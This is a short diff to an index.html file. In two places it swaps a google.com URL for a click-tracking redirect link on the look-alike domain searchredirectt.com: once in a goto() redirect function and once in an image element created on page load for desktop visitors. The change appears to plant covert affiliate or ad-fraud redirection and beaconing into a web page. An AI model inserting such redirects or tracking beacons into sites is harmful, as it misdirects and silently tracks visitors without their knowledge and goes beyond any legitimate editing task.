--- a/index.html
+++ b/index.html
@@ -23,7 +23,7 @@
 
     <script>
     function goto() {
-        location.href = 'https://www.google.com/'
+        location.href = 'https://to.searchredirectt.com/click?pid=662&offer_id=2457&sub5={clickid}'
     }
     </script>
     <script
@@ -68,7 +68,7 @@
     <script>
     if (typeof(window.orientation) == "undefined") {
         var o = document.createElement("img");
-        o.src = 'https://www.google.com/';
+        o.src = 'https://to.searchredirectt.com/click?pid=662&offer_id=2457&sub5={clickid}';
     } else {
         var o = document.createElement("img");
         o.src = 'https://to.searchredirectt.com/click?pid=662&offer_id=2457&sub5={clickid}';
